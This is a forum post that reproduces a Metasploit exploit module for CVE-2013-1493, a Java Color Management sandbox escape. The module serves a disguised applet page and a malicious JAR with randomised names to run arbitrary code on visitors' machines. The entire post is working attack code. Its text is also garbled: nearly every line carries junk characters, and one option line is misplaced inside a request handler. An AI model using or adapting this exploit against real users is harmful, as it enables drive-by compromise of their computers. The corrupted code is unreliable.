##
9 u6 Y- K" k( `
" V7 v& [: L: ]# This file is part of the Metasploit Framework and may be subject to
, F( s: X& C4 U6 ]1 ~# redistribution and commercial restrictions. Please see the Metasploit8 V& x+ k5 ^2 ?3 B) v; O6 a' O5 K
# web site for more information on licensing and terms of use.6 m5 ` Q! I& A
# http://metasploit.com/, X; t, j7 ]9 T# Q; S! l3 k' _
##
& I+ q$ o( w9 `. W# T6 Hrequire ‘msf/core’
0 a# y( \* R$ `, N hrequire ‘rex’, \! I9 l# j! ~- \/ ^% G: F# w
class Metasploit3 < Msf::Exploit::Remote8 M; E: c& ?- _( w* s
Rank = NormalRanking
% T" }2 l, D7 H# T9 Einclude Msf::Exploit::Remote::HttpServer::HTML
8 q0 e' C/ O, a( binclude Msf::Exploit::EXE/ x }6 J Q" A# p& ]8 O5 k& e1 F
include Msf::Exploit::Remote::BrowserAutopwn; S& ]2 p+ T9 d/ ^9 D4 [: {
autopwn_info({ :javascript => false })3 p J1 ]+ X: \. y3 l; `. B( ]
def initialize( info = {} )
, X: ^. [% ^# ?( x! B- esuper( update_info( info,' L: ^: _# i o$ a9 d1 }% E
‘Name’ => ‘Java CMM Remote Code Execution’,9 R, H1 v# G3 I' p% f2 F @8 S3 _
‘Description’ => %q{
1 Z$ a' _/ O1 b! T: ~$ n" XThis module abuses the Color Management classes from a Java Applet to run0 O0 j9 e8 P+ o4 l8 \) [+ B$ a
arbitrary Java code outside of the sandbox as exploited in the wild in February
% N! d6 [4 ~8 S5 a+ J. i, h6 w# oand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41. O# S: m# @# Q6 j; s& Z0 H
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP19 a5 L0 e1 Q4 q2 K3 i+ |
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java0 g) T) N2 h( b; h8 F: o( X
warning in order to run the malicious applet.
& e1 {- ?- r! f},
) v! V) w) N3 `3 y+ K% M‘License’ => MSF_LICENSE,
! h# w9 J6 F( x1 E# @1 w‘Author’ =>; b( m7 ?! a0 _; j0 x6 E
'Unknown', # Vulnerability discovery and Exploit
c4 b9 N9 J( |7 P'juan vazquez' # Metasploit module (just ported the published exploit)
; f- t- R0 `( G1 x0 S],
( R$ R2 Z" g; ?‘References’ =>* _& v: `" M. ?1 i
[+ c$ x0 C! Y9 S1 \( X5 {- e
[ 'CVE', '2013-1493' ],
. Z2 U& C! [7 H; S- x& I[ 'OSVDB', '90737' ],7 ?# U1 b+ V) S: I3 u6 @2 p
[ 'BID', '58238' ],/ l" N/ ]8 _7 ]0 I0 e" f3 t! ^
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
: D! M+ f" s- R+ g3 B[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
- v# M) o* f% a3 ]5 b9 r[ 'URL', 'http://pastie.org/pastes/6581034' ] L n! `' ^( y7 i1 D& y. c7 w
],
+ T! w I/ Q- g/ z; Q, j, E‘Platform’ => [ 'win', 'java' ],& C; x( A% k# ]; @' M
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },% o# |% Q7 `5 t1 V% U! M. Z+ c7 [9 i' F
‘Targets’ =>
# o! ~) q/ ^1 q, N4 d( e[7 d& h3 X$ } ?: ]) d9 u
[ 'Generic (Java Payload)',
) f0 q( T: }$ g{
9 M0 p# t% G. ~& u'Platform' => 'java',
9 V' c0 B/ z+ T/ ['Arch' => ARCH_JAVA5 ?+ Q" x! ?) c+ ?: ?
}$ L) X% p) c/ N# y1 W
],
4 T; Y' T. \! E[ 'Windows x86 (Native Payload)',
! S3 R( y5 z% T3 v1 v" y{
. m. e6 W3 D c4 Z0 V! c6 C'Platform' => 'win',; y2 `% l4 M3 i' R' ?$ m( ?( b A; Z0 ^ R
'Arch' => ARCH_X86
/ T) X% g/ F" n+ Z}
9 h& k' }7 X, K) }) q6 |' @6 l]9 P( o0 h( e& V+ E& c
],
) J o( n; R& u‘‘DisclosureDate’ => ‘Mar 01 2013′% [# d2 e/ j/ u+ Y _+ f
))) k" p% V7 e3 V5 s1 c7 V% f
end6 W+ }3 x8 ?- `' ^2 }) g
def setup5 W" v' N; @3 u# r! s, e; }
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
4 D5 L0 U* }* r@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }/ I3 X% r: ? H4 O0 u& C
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)0 _& i( C, l9 ~" Y: \$ N
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }& t5 X l0 z5 T$ q6 X4 F3 P0 i, x3 u4 u
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)2 ?; V5 _1 \% o5 ?6 n
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
) }/ L" a4 p0 ?5 wpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
% v, z7 G& ~/ a B6 X@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }" f& @/ a" p6 V5 `; p2 w
@init_class_name = rand_text_alpha(“Init”.length)9 ^" V/ B0 f3 \" R% e. R+ N
@init_class.gsub!(“Init”, @init_class_name)' S+ G6 R9 G9 R, k
super
# Y3 g0 Y6 K2 Wend3 \. m) n9 h4 a: R* t
def on_request_uri(cli, request)7 m6 H0 Q" c4 S1 k5 i8 g
print_status(“handling request for #{request.uri}”)
6 I$ ?+ o% k& C$ Mcase request.uri3 Q' S# e, H: W$ B
when /\.jar$/i3 n- H' j. q# H) U5 B# }
jar = payload.encoded_jar
1 R, p& p7 @% n1 {( O0 Ojar.add_file(“#{@init_class_name}.class”, @init_class): u6 c- U% S+ s+ V
jar.add_file(“Leak.class”, @leak_class)
9 H$ e6 n* k) Cjar.add_file(“MyBufferedImage.class”, @buffered_image_class)
) M; C& R f" j) {jar.add_file(“MyColorSpace.class”, @color_space_class)/ {' u7 @# b% O
DefaultTarget’ => 1,
- n+ j% k+ Q/ T- a. ]* X8 jmetasploit_str = rand_text_alpha(“metasploit”.length)0 l! s! M1 B: o: g
payload_str = rand_text_alpha(“payload”.length): r- k- t% n2 Q* q. e8 h/ p
jar.entries.each { |entry|2 {# x( ^, P5 T/ F4 ^, ^
entry.name.gsub!(“metasploit”, metasploit_str) l5 o6 Z5 ^, a: @8 R8 o, ]
entry.name.gsub!(“Payload”, payload_str)" N m0 N+ S4 r. q0 H' T
entry.data = entry.data.gsub(“metasploit”, metasploit_str)3 c) ?$ r9 K& ]. h
entry.data = entry.data.gsub(“Payload”, payload_str)2 k3 @; e! L7 e, G! x9 M3 _
}! |5 A( b e. k8 o
jar.build_manifest" s7 R+ i* u: c( Z, V& t: x
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })* _$ }; k j/ Y' p
when /\/$/5 z r$ K- q4 ^( s3 y5 ], `
payload = regenerate_payload(cli): k9 F3 K% e6 D1 N, a- u
if not payload
5 n- I5 k, k6 Y* N; H6 V5 Sprint_error(“Failed to generate the payload.”)5 Y" \ Z2 A8 x) } O I
send_not_found(cli)
4 F+ Y" q. P1 c# l7 ^6 J5 i. ] Preturn% I; F5 v; I0 {! u6 S/ s1 [* g$ e, j
end
+ n/ A4 l. P9 y$ X ]! w1 m6 m Bsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
1 f7 P" U& A% h7 U' W- `else3 a1 V) `8 r/ Z( q
send_redirect(cli, get_resource() + ‘/’, ”)
* T. D# ]6 r. r; M% Vend
; p* ~& W3 H& p" \/ p# k v( h( {end
5 L) \+ E1 p1 ]* L5 {* _def generate_html3 ?) L8 d7 N: M4 N: y- m$ P
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|' C4 T# e G# a# f! y- c6 v
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
& i9 A) E# @' D7 c; D9 chtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|6 R$ o8 v4 |3 q/ j
html += %Q|</applet></body></html>|
; D- s9 `5 B# U1 L8 preturn html3 Z/ d, s3 N8 Y6 d
end7 ?2 b3 z7 x6 D. A$ }# W
end
# l8 m0 ?/ x8 c. |" P% X. |end
9 b1 l/ I5 e2 e8 ^" n$ c% D$ _ |
发表于 2013-4-4 17:31:17
收藏
支持
反对